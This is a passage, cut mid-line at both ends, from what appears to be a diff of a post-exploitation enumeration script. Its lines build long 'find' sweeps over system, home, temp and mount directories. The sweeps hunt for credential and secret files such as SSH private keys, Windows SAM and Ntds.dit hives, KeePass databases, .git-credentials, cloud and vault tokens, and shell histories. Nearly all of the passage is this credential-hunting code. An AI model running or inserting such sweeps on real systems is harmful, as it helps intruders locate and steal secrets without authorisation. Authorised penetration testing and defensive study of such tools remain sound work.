\"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_VAR=`eval_bckgrd "find /var -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"sess_*\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_APPLICATIONS=`eval_bckgrd "find /applications -type d -name \"roundcube\" -o -name \"filezilla\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \"mysql\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"sentry\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".bluemix\" -o -name \".irssi\" -o -name \"environments\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"seeddms*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_BIN=`eval_bckgrd "find /bin -type d -name \"roundcube\" -o -name \"filezilla\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \"mysql\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"sentry\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".bluemix\" -o -name \".irssi\" -o -name \"environments\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"seeddms*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_CACHE=`eval_bckgrd "find /.cache -type d -name \"roundcube\" -o -name \"filezilla\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \"mysql\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"sentry\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".bluemix\" -o -name \".irssi\" -o -name \"environments\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"seeddms*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_CDROM=`eval_bckgrd "find /cdrom -type d -name \"roundcube\" -o -name \"filezilla\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \"mysql\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"sentry\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".bluemix\" -o -name \".irssi\" -o -name \"environments\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"seeddms*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_ETC=`eval_bckgrd "find /etc -type d -name \"system.d\" -o -name \"roundcube\" -o -name \"filezilla\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \"mysql\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"sentry\" -o -name \"sites-enabled\" -o -name \"bind\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".bluemix\" -o -name \".irssi\" -o -name \"environments\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"seeddms*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -type d -name \"roundcube\" -o -name \"filezilla\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \"mysql\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"sentry\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".bluemix\" -o -name \".irssi\" -o -name \"environments\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"seeddms*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_MEDIA=`eval_bckgrd "find /media -type d -name \"roundcube\" -o -name \"filezilla\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \"mysql\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"sentry\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".bluemix\" -o -name \".irssi\" -o -name \"environments\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"seeddms*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_MNT=`eval_bckgrd "find /mnt -type d -name \"roundcube\" -o -name \"filezilla\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \"mysql\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"sentry\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".bluemix\" -o -name \".irssi\" -o -name \"environments\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"seeddms*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_OPT=`eval_bckgrd "find /opt -type d -name \"roundcube\" -o -name \"filezilla\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \"mysql\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"sentry\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".bluemix\" -o -name \".irssi\" -o -name \"environments\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"seeddms*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_PRIVATE=`eval_bckgrd "find /private -type d -name \"roundcube\" -o -name \"filezilla\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \"mysql\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"sentry\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".bluemix\" -o -name \".irssi\" -o -name \"environments\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"seeddms*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SBIN=`eval_bckgrd "find /sbin -type d -name \"roundcube\" -o -name \"filezilla\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \"mysql\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"sentry\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".bluemix\" -o -name \".irssi\" -o -name \"environments\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"seeddms*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SNAP=`eval_bckgrd "find /snap -type d -name \"roundcube\" -o -name \"filezilla\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \"mysql\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"sentry\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".bluemix\" -o -name \".irssi\" -o -name \"environments\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"seeddms*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SRV=`eval_bckgrd "find /srv -type d -name \"roundcube\" -o -name \"filezilla\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \"mysql\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"sentry\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".bluemix\" -o -name \".irssi\" -o -name \"environments\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"seeddms*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_TMP=`eval_bckgrd "find /tmp -type d -name \"roundcube\" -o -name \"filezilla\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \"mysql\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"sentry\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".bluemix\" -o -name \".irssi\" -o -name \"environments\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"seeddms*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_USR=`eval_bckgrd "find /usr -type d -name \"roundcube\" -o -name \"filezilla\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \"mysql\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"sentry\" -o -name \"sites-enabled\" -o -name \"bind\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".bluemix\" -o -name \".irssi\" -o -name \"environments\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"seeddms*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_VAR=`eval_bckgrd "find /var -type d -name \"roundcube\" -o -name \"filezilla\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \"mysql\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"sentry\" -o -name \"sites-enabled\" -o -name \"bind\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".bluemix\" -o -name \".irssi\" -o -name \"environments\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"seeddms*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_APPLICATIONS=`eval_bckgrd "find /applications -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"*vnc*.xml\" -o -name \"hostapd.conf\" -o -name \"AzureRMContext.json\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"*.ovpn\" -o -name \"TokenCache.dat\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ftp.config\" -o -name \"tomcat-users.xml\" -o -name \"pg_hba.conf\" -o -name \"db.php\" -o -name \"redis.conf\" -o -name \"psk.txt\" -o -name \"*.cer\" -o -name \"config.php\" -o -name \"*.jks\" -o -name \".env\" -o -name \"access_tokens.db\" -o -name \"access.log\" -o -name \"gitlab.rm\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.ftpconfig\" -o -name \"ws_ftp.ini\" -o -name \"credentials.db\" -o -name \"000-default.conf\" -o -name \"*.sqlite3\" -o -name \"ipsec.conf\" -o -name \".lesshst\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"id_rsa*\" -o -name \".erlang.cookie\" -o -name \".profile\" -o -name \"unattend.inf\" -o -name \".ldaprc\" -o -name \"sentry.conf.py\" -o -name \"sysprep.xml\" -o -name \"mongod*.conf\" -o -name \"ntuser.dat\" -o -name \".bashrc\" -o -name \"gitlab.yml\" -o -name \"racoon.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"drives.xml\" -o -name \"*config*.php\" -o -name \".wgetrc\" -o -name \"groups.xml\" -o -name \"postgresql.conf\" -o -name \".vault-token\" -o -name \"*.csr\" -o -name \"cesi.conf\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"id_dsa*\" -o -name \"wsl.exe\" -o -name \"backups\" -o -name \"*.der\" -o -name \"kadm5.acl\" -o -name \".github\" -o -name \"*.pgp\" -o -name \"web*.config\" -o -name \".git\" -o -name \"*.timer\" -o -name \"ddclient.conf\" -o -name \"*.crt\" -o -name \"pagefile.sys\" -o -name \"php.ini\" -o -name \"appcmd.exe\" -o -name \"recentservers.xml\" -o -name \"backup\" -o -name \"elasticsearch.y*ml\" -o -name \"Ntds.dit\" -o -name \"SAM\" -o -name \"*.keyring\" -o -name \"https.conf\" -o -name \"protecteduserkey.bin\" -o -name \"secrets.yml\" -o -name \".sudo_as_admin_successful\" -o -name \"autologin.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"setupinfo\" -o -name \"my.ini\" -o -name \"security.sav\" -o -name \"*.viminfo\" -o -name \"kcpassword\" -o -name \"KeePass.config*\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"*vnc*.ini\" -o -name \"autologin\" -o -name \"default.sav\" -o -name \"unattend.txt\" -o -name \"unattended.xml\" -o -name \"krb5.conf\" -o -name \"my.cnf\" -o -name \"software\" -o -name \"passwd\" -o -name \".plan\" -o -name \"system.sav\" -o -name \"legacy_credentials.db\" -o -name \"winscp.ini\" -o -name \"azureProfile.json\" -o -name \"unattend.xml\" -o -name \"snmpd.conf\" -o -name \"rsyncd.secrets\" -o -name \"*.socket\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"*.gpg\" -o -name \"wcx_ftp.ini\" -o -name \".git-credentials\" -o -name \".gitconfig\" -o -name \"https-xampp.conf\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"*.kdbx\" -o -name \"error.log\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.swp\" -o -name \"*.pfx\" -o -name \"*.db\" -o -name \"docker-compose.yml\" -o -name \"bash.exe\" -o -name \"KeePass.enforced*\" -o -name \"authorized_hosts\" -o -name \"ConsoleHost_history.txt\" -o -name \"AppEvent.Evt\" -o -name \"credentials\" -o -name \"scclient.exe\" -o -name \"ffftp.ini\" -o -name \".google_authenticator\" -o -name \"supervisord.conf\" -o -name \"passbolt.php\" -o -name \"accessTokens.json\" -o -name \"sitemanager.xml\" -o -name \"Dockerfile\" -o -name \"server.xml\" -o -name \"pgadmin*.db\" -o -name \"mariadb.cnf\" -o -name \"access_tokens.json\" -o -name \".htpasswd\" -o -name \"FreeSSHDservice.ini\" -o -name \"SecEvent.Evt\" -o -name \"rsyncd.conf\" -o -name \"filezilla.xml\" -o -name \"debian.cnf\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"*password*\" -o -name \"sites.ini\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \".recently-used.xbel\" -o -name \"storage.php\" -o -name \"authorized_keys\" -o -name \"mosquitto.conf\" -o -name \"index.dat\" -o -name \"*.keystore\" -o -name \"iis6.log\" -o -name \"*.rdg\" -o -name \"*.p12\" -o -name \".rhosts\" -o -name \"wp-config.php\" -o -name \"cloud.cfg\" -o -name \"httpd.conf\" -o -name \"scheduledtasks.xml\" -o -name \"datasources.xml\" -o -name \".*_history.*\" -o -name \"settings.php\" -o -name \"krb5.keytab\" -o -name \".k5login\" -o -name \"kibana.y*ml\" -o -name \"*.gnupg\" -o -name \"setupinfo.bak\" -o -name \"software.sav\" -o -name \"SYSTEM\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_BIN=`eval_bckgrd "find /bin -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"*vnc*.xml\" -o -name \"hostapd.conf\" -o -name \"AzureRMContext.json\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"*.ovpn\" -o -name \"TokenCache.dat\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ftp.config\" -o -name \"tomcat-users.xml\" -o -name \"pg_hba.conf\" -o -name \"db.php\" -o -name \"redis.conf\" -o -name \"psk.txt\" -o -name \"*.cer\" -o -name \"config.php\" -o -name \"*.jks\" -o -name \".env\" -o -name \"access_tokens.db\" -o -name \"access.log\" -o -name \"gitlab.rm\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.ftpconfig\" -o -name \"ws_ftp.ini\" -o -name \"credentials.db\" -o -name \"000-default.conf\" -o -name \"*.sqlite3\" -o -name \"ipsec.conf\" -o -name \".lesshst\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"id_rsa*\" -o -name \".erlang.cookie\" -o -name \".profile\" -o -name \"unattend.inf\" -o -name \".ldaprc\" -o -name \"sentry.conf.py\" -o -name \"sysprep.xml\" -o -name \"mongod*.conf\" -o -name \"ntuser.dat\" -o -name \".bashrc\" -o -name \"gitlab.yml\" -o -name \"racoon.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"drives.xml\" -o -name \"*config*.php\" -o -name \".wgetrc\" -o -name \"groups.xml\" -o -name \"postgresql.conf\" -o -name \".vault-token\" -o -name \"*.csr\" -o -name \"cesi.conf\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"id_dsa*\" -o -name \"wsl.exe\" -o -name \"backups\" -o -name \"*.der\" -o -name \"kadm5.acl\" -o -name \".github\" -o -name \"*.pgp\" -o -name \"web*.config\" -o -name \".git\" -o -name \"*.timer\" -o -name \"ddclient.conf\" -o -name \"*.crt\" -o -name \"pagefile.sys\" -o -name \"php.ini\" -o -name \"appcmd.exe\" -o -name \"recentservers.xml\" -o -name \"backup\" -o -name \"elasticsearch.y*ml\" -o -name \"Ntds.dit\" -o -name \"SAM\" -o -name \"*.keyring\" -o -name \"https.conf\" -o -name \"protecteduserkey.bin\" -o -name \"secrets.yml\" -o -name \".sudo_as_admin_successful\" -o -name \"autologin.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"setupinfo\" -o -name \"my.ini\" -o -name \"security.sav\" -o -name \"*.viminfo\" -o -name \"kcpassword\" -o -name \"KeePass.config*\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"*vnc*.ini\" -o -name \"autologin\" -o -name \"default.sav\" -o -name \"unattend.txt\" -o -name \"unattended.xml\" -o -name \"krb5.conf\" -o -name \"my.cnf\" -o -name \"software\" -o -name \"passwd\" -o -name \".plan\" -o -name \"system.sav\" -o -name \"legacy_credentials.db\" -o -name \"winscp.ini\" -o -name \"azureProfile.json\" -o -name \"unattend.xml\" -o -name \"snmpd.conf\" -o -name \"rsyncd.secrets\" -o -name \"*.socket\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"*.gpg\" -o -name \"wcx_ftp.ini\" -o -name \".git-credentials\" -o -name \".gitconfig\" -o -name \"https-xampp.conf\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"*.kdbx\" -o -name \"error.log\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.swp\" -o -name \"*.pfx\" -o -name \"*.db\" -o -name \"docker-compose.yml\" -o -name \"bash.exe\" -o -name \"KeePass.enforced*\" -o -name \"authorized_hosts\" -o -name \"ConsoleHost_history.txt\" -o -name \"AppEvent.Evt\" -o -name \"credentials\" -o -name \"scclient.exe\" -o -name \"ffftp.ini\" -o -name \".google_authenticator\" -o -name \"supervisord.conf\" -o -name \"passbolt.php\" -o -name \"accessTokens.json\" -o -name \"sitemanager.xml\" -o -name \"Dockerfile\" -o -name \"server.xml\" -o -name \"pgadmin*.db\" -o -name \"mariadb.cnf\" -o -name \"access_tokens.json\" -o -name \".htpasswd\" -o -name \"FreeSSHDservice.ini\" -o -name \"SecEvent.Evt\" -o -name \"rsyncd.conf\" -o -name \"filezilla.xml\" -o -name \"debian.cnf\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"*password*\" -o -name \"sites.ini\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \".recently-used.xbel\" -o -name \"storage.php\" -o -name \"authorized_keys\" -o -name \"mosquitto.conf\" -o -name \"index.dat\" -o -name \"*.keystore\" -o -name \"iis6.log\" -o -name \"*.rdg\" -o -name \"*.p12\" -o -name \".rhosts\" -o -name \"wp-config.php\" -o -name \"cloud.cfg\" -o -name \"httpd.conf\" -o -name \"scheduledtasks.xml\" -o -name \"datasources.xml\" -o -name \".*_history.*\" -o -name \"settings.php\" -o -name \"krb5.keytab\" -o -name \".k5login\" -o -name \"kibana.y*ml\" -o -name \"*.gnupg\" -o -name \"setupinfo.bak\" -o -name \"software.sav\" -o -name \"SYSTEM\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_CACHE=`eval_bckgrd "find /.cache -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"*vnc*.xml\" -o -name \"hostapd.conf\" -o -name \"AzureRMContext.json\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"*.ovpn\" -o -name \"TokenCache.dat\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ftp.config\" -o -name \"tomcat-users.xml\" -o -name \"pg_hba.conf\" -o -name \"db.php\" -o -name \"redis.conf\" -o -name \"psk.txt\" -o -name \"*.cer\" -o -name \"config.php\" -o -name \"*.jks\" -o -name \".env\" -o -name \"access_tokens.db\" -o -name \"access.log\" -o -name \"gitlab.rm\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.ftpconfig\" -o -name \"ws_ftp.ini\" -o -name \"credentials.db\" -o -name \"000-default.conf\" -o -name \"*.sqlite3\" -o -name \"ipsec.conf\" -o -name \".lesshst\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"id_rsa*\" -o -name \".erlang.cookie\" -o -name \".profile\" -o -name \"unattend.inf\" -o -name \".ldaprc\" -o -name \"sentry.conf.py\" -o -name \"sysprep.xml\" -o -name \"mongod*.conf\" -o -name \"ntuser.dat\" -o -name \".bashrc\" -o -name \"gitlab.yml\" -o -name \"racoon.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"drives.xml\" -o -name \"*config*.php\" -o -name \".wgetrc\" -o -name \"groups.xml\" -o -name \"postgresql.conf\" -o -name \".vault-token\" -o -name \"*.csr\" -o -name \"cesi.conf\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"id_dsa*\" -o -name \"wsl.exe\" -o -name \"backups\" -o -name \"*.der\" -o -name \"kadm5.acl\" -o -name \".github\" -o -name \"*.pgp\" -o -name \"web*.config\" -o -name \".git\" -o -name \"*.timer\" -o -name \"ddclient.conf\" -o -name \"*.crt\" -o -name \"pagefile.sys\" -o -name \"php.ini\" -o -name \"appcmd.exe\" -o -name \"recentservers.xml\" -o -name \"backup\" -o -name \"elasticsearch.y*ml\" -o -name \"Ntds.dit\" -o -name \"SAM\" -o -name \"*.keyring\" -o -name \"https.conf\" -o -name \"protecteduserkey.bin\" -o -name \"secrets.yml\" -o -name \".sudo_as_admin_successful\" -o -name \"autologin.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"setupinfo\" -o -name \"my.ini\" -o -name \"security.sav\" -o -name \"*.viminfo\" -o -name \"kcpassword\" -o -name \"KeePass.config*\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"*vnc*.ini\" -o -name \"autologin\" -o -name \"default.sav\" -o -name \"unattend.txt\" -o -name \"unattended.xml\" -o -name \"krb5.conf\" -o -name \"my.cnf\" -o -name \"software\" -o -name \"passwd\" -o -name \".plan\" -o -name \"system.sav\" -o -name \"legacy_credentials.db\" -o -name \"winscp.ini\" -o -name \"azureProfile.json\" -o -name \"unattend.xml\" -o -name \"snmpd.conf\" -o -name \"rsyncd.secrets\" -o -name \"*.socket\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"*.gpg\" -o -name \"wcx_ftp.ini\" -o -name \".git-credentials\" -o -name \".gitconfig\" -o -name \"https-xampp.conf\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"*.kdbx\" -o -name \"error.log\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.swp\" -o -name \"*.pfx\" -o -name \"*.db\" -o -name \"docker-compose.yml\" -o -name \"bash.exe\" -o -name \"KeePass.enforced*\" -o -name \"authorized_hosts\" -o -name \"ConsoleHost_history.txt\" -o -name \"AppEvent.Evt\" -o -name \"credentials\" -o -name \"scclient.exe\" -o -name \"ffftp.ini\" -o -name \".google_authenticator\" -o -name \"supervisord.conf\" -o -name \"passbolt.php\" -o -name \"accessTokens.json\" -o -name \"sitemanager.xml\" -o -name \"Dockerfile\" -o -name \"server.xml\" -o -name \"pgadmin*.db\" -o -name \"mariadb.cnf\" -o -name \"access_tokens.json\" -o -name \".htpasswd\" -o -name \"FreeSSHDservice.ini\" -o -name 